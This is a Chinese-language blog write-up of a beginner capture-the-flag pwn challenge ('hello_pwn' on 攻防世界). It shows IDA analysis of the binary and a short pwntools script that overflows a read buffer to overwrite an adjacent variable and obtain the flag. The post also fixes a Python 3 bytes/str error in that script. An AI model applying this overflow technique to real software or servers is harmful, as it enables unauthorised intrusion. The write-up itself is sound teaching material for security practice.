初学pwn

攻防世界的第二道题目,hello_pwn。
首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。
在这里插入图片描述
下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。
shift+f12查看字符串
在这里插入图片描述
看见可疑字符串welcome to ctf双击跟进,选中字符串Ctrl+x查找字符串的位置,f5反编译,可以看到伪代码
在这里插入图片描述
可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。
可以发现里边会输出flag.txt,也就是我们的目标,所以我们现在需要使 dword_60106C 的值与 1853186401相等。点金这个变量看一下。发现它与unk_601068 的地址只相差四个字节。并且在main函数中有一个read在读取数据输入到变量中。
因此,我们可以利用read函数,将dword_60106C的值修改为1853186401。
在这里插入图片描述
具体脚本如下

from pwn import*
p = remote('111.200.241.244',60015)
#p = process('./hello_pwn')
payload = 'a'*4 + p64(1853186401).decode("iso-8859-1")
p.recvuntil("lets get helloworld for bof\n")
p.sendline(payload)
p.interactive()

这是使用sendline,在read进行读取的时候,想其中输入4个‘a’,因为一个字符型变量占据一个字节的空间,所以向后偏移之后,1853186401这个值就会赋给dword_60106C,达成条件,调用函数,获得flag。
在这里插入图片描述
在编写脚本的时候,遇到一个问题。因为我使用的是python3,对数据的格式要求更严格,因此,如果使用
payload = ‘a’ * 4 + p64(1853186401)
进行编译的话,会报错
File “mex.py”, line 4, in
payload = ‘a’*4 + p64(1853186401)
TypeError: can only concatenate str (not “bytes”) to str
这里显示字符类型不匹配,因此不能进行拼接。经过百度,有个大佬给出了一个解决方法,对他进行转码

payload = 'a'*4 + p64(1853186401).decode("iso-8859-1")
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值